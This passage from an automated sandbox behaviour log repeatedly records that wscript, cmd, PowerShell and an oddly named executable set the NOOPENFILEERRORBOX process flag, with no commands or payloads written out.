Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
